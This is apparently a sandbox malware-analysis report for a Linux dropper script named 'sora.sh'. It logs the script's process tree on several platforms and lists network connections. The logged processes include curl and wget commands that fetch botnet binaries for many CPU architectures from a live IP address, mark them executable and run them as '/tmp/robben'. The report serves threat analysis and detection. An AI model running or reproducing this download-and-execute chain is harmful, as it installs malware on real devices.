[/tmp/sora.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-11 | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-11 | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-11 | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-11 | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:20
Platform
debian12-mipsel-20240221-en
Max time kernel
48s
Max time network
53s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-logrotate.service-vLtvov systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-timedated.service-d9ml1p]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-f8a695a86dbe4179a46a0f0f01140927-systemd-logind.service-KWZVhp]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-1 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-1 | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-1 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-1 | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:31
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
152s
Max time network
571s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-timedated.service-N0QTdG systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-timedated.service-N0QTdG systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-timedated.service-N0QTdG systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x gdm3-config-err-BJqXPT gdm3-config-err-bRDeGO robben snap-private-tmp sora.sh systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-ModemManager.service-sPkG2a systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-colord.service-MBbEnw systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-polkit.service-QjDT6o systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-power-profiles-daemon.service-l2BzvR systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-switcheroo-control.service-cAaET6 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-logind.service-DZgTGs systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-oomd.service-6w0gp7 systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-systemd-resolved.service-wMfhQu systemd-private-9a4279ae4fb742b8a967ceaa2897ec8c-upower.service-dFO4rM]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.58:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | canonical-lgw01.cdn.snapcraftcontent.com | udp |
| US | 8.8.8.8:53 | canonical-lgw01.cdn.snapcraftcontent.com | udp |
| GB | 185.125.190.26:443 | canonical-lgw01.cdn.snapcraftcontent.com | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.58:443 | api.snapcraft.io | tcp |
| US | 1.1.1.1:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 1.1.1.1:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 91.189.91.43:443 | canonical-bos01.cdn.snapcraftcontent.com | tcp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
| US | 1.1.1.1:53 | canonical-lgw01.cdn.snapcraftcontent.com | udp |
| US | 1.1.1.1:53 | canonical-lgw01.cdn.snapcraftcontent.com | udp |
| GB | 185.125.190.27:443 | canonical-lgw01.cdn.snapcraftcontent.com | tcp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
| US | 1.1.1.1:53 | _http._tcp.se.archive.ubuntu.com | udp |
| US | 1.1.1.1:53 | _http._tcp.security.ubuntu.com | udp |
| US | 1.1.1.1:53 | security.ubuntu.com | udp |
| US | 1.1.1.1:53 | security.ubuntu.com | udp |
| US | 1.1.1.1:53 | se.archive.ubuntu.com | udp |
| US | 1.1.1.1:53 | se.archive.ubuntu.com | udp |
| GB | 185.125.190.83:80 | security.ubuntu.com | tcp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.59:443 | api.snapcraft.io | tcp |
| SE | 194.71.11.163:80 | se.archive.ubuntu.com | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:22
Platform
debian9-armhf-20240611-en
Max time kernel
98s
Max time network
126s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
